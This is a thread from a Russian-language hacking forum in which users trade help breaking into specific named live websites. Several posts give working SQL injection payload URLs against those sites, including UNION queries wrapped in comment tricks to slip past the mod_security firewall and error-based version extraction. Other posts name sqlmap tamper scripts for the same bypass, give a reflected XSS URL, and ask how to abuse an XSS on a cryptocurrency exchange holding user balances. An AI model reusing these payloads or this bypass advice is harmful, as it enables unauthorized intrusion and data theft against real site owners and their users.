26.07.2018, 18:15
|
|
Познающий
Регистрация: 25.08.2013
Сообщений: 92
Провел на форуме:
35643
Репутация:
3
|
|
2 BabaDook
Вероятнее всего потому, что в мануалах по дефолту так написано.
2 grelly
modsecurityversioned и modsecurityzeroversioned -тамперы под mod_security
|
|
|
26.07.2018, 18:18
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
Сообщение от grelly
↑
Всем доброго времени суток, нашел SQLi, но при попытке раскрутки упираюсь в ваф Mod_security. Sqlmap при попытке атаки целевого url
http://shoebrand.co.uk/index.php?rou...th=64&limit=32
с использованием тампера between возвращает ошибку:
[WARNING] HTTP error codes detected during run:
403 (Forbidden) - 1 times.
Найденные уязвимости:
Parameter: path (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: route=product/category&path=64 AND 9469=9469&limit=32
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: route=product/category&path=64 AND SLEEP(10)&limit=32
Может кто-нибудь помочь советом, в какую сторону нужно копать для раскрутки вручную?
Код:
path=64 group by elt(rand(0)|0,version()) having avg(0)-- -
Duplicate entry '5.6.39-83.1' for key 'group_key
Почитайте больше про SQL инъекции, в особенности, про вывод в ошибке! А не про то как пользоваться sqlmap.
|
|
|
|
26.07.2018, 18:19
|
|
Участник форума
Регистрация: 06.07.2015
Сообщений: 240
Провел на форуме:
70303
Репутация:
145
|
|
Там и с Union особых проблем нет
Код:
http://shoebrand.co.uk/index.php?route=product/category&path=64+AND+FALSe+/*!50000UniON*//*!50000SeLeCT*/1,version(),3+--+-&limit=32
|
|
|
|
28.07.2018, 16:12
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
Код:
http://www.quattrobi.it/ru/no_cache/proekty/view/project/168'.html?no_cache=1
Можно что нить сделать? |
|
|
|
28.07.2018, 19:15
|
|
Участник форума
Регистрация: 06.07.2015
Сообщений: 240
Провел на форуме:
70303
Репутация:
145
|
|
Маловероятно. На сайте присутствуют и другие уязвимости,можно попробовать посмотреть что то еще:
Код:
http://www.quattrobi.it/it/no_cache/prodotti/famiglia/?family[id]=98&marcatura=">alert(document.domain)
|
|
|
|
29.07.2018, 20:05
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от DezMond™
↑
Помогите ваф обойти
Код:
http://www.reseau-canope.fr/climatscolaire/ressources/resultat-de-recherche.html?id=58&tx_cndpclimatsco_pi1%5Baxes%5D=0&tx_cndpclimatsco_pi1%5Bthemes%5D=0&tx_cndpclimatsco_pi1%5Blocalisations%5D=a_32+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+--+
#1
Код:
http://www.reseau-canope.fr/climatscolaire/ressources/resultat-de-recherche.html?id=58&tx_cndpclimatsco_pi1%5Blocalisations%5D=a_32+and+1=2+union+distinct+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,@@version,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,(35)from+dual+--+
#2
Код:
http://www.reseau-canope.fr/climatscolaire/ressources/resultat-de-recherche.html?id=58&tx_cndpclimatsco_pi1%5Blocalisations%5D=a_32+and+1=if((select(1)from+dual)=1,1,2)+--+
Сообщение от DezMond™
↑
Код:
http://www.quattrobi.it/ru/no_cache/proekty/view/project/168'.html?no_cache=1
Можно что нить сделать?
Код:
http://www.quattrobi.it/ru/no_cache/proekty/view/project/168.html?no_cache=1
Прочтите текст ошибки
|
|
|
|
30.07.2018, 22:36
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от Jerri
↑
Хранимая может быть пассивной, т.е. от пользователя требуется что-то сделать для выполнения внедренного кода. Отраженная может быть активной, если после перехода по ссылке, например, код выполнится без дополнительных действий пользователя.
Пускай поздно, но промолчать не могу.
Для вас и других, кто прочтёт сообщение.
XSS разделяют на:
Stored или Persistent - хранимые (в простонародье активные)
Reflected - отраженные (... пассивные)
DOM-Based
Self-XSS (как Stored, так и Reflected) - исполняемые только на личных страницах и сценариях пользователя и не доступные другим пользователям
То что вы описываете, это называется User Interaction (действие пользователя). Соответственно бывают и Stored XSS with/without User Interaction, так и Reflected XSS with/without User Interaction
|
|
|
|
30.07.2018, 22:48
|
|
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
Провел на форуме:
104689
Репутация:
1
|
|
Сообщение от BigBear
↑
Пускай поздно, но промолчать не могу.
Для вас и других, кто прочтёт сообщение.
XSS разделяют на:
Stored или Persistent - хранимые (в простонародье активные)
Reflected - отраженные (... пассивные)
DOM-Based
Self-XSS (как Stored, так и Reflected) - исполняемые только на личных страницах и сценариях пользователя и не доступные другим пользователям
То что вы описываете, это называется User Interaction (действие пользователя). Соответственно бывают и Stored XSS with/without User Interaction, так и Reflected XSS with/without User Interaction
Допустим есть биржа, где есть баланс и вся ***ня, и там есть XSS (пример прикрепил)
Так вот что можно сделать ?
.SpoilerTarget" type="button">Spoiler: Скрин
|
|
|
|
31.07.2018, 13:21
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
Сообщение от BigBear
↑
Код:
http://www.quattrobi.it/ru/no_cache/proekty/view/project/168.html?no_cache=1
Прочтите текст ошибки
я понимаю что колонка id не найдена, просто думал есть какие то варики с выводом в ошибке.
|
|
|
|
01.08.2018, 22:48
|
|
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
Провел на форуме:
97114
Репутация:
24
|
|
Почему Бурп не отображает содержимое GraphQL запросов?
Чем перехватывать и тестировать?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
